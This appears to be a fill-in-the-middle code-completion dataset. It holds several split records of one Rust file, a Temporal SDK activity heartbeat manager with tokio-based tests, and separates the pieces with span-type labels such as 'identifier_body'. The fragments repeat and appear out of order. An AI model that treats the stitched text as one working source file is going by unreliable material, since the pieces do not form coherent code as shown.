// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
} | /// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion. | random_line_split |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
/// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion.
if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() |
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
} | identifier_body |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
/// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion.
if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => |
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
} | conditional_block |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat
/// processors to terminate gracefully.
pub async fn shutdown(&self) {
// If shutdown was called multiple times, shutdown signal has been sent already and consumer
// might have been dropped already, meaning that sending to the channel may fail.
// All we need to do is to simply await on handle for the completion.
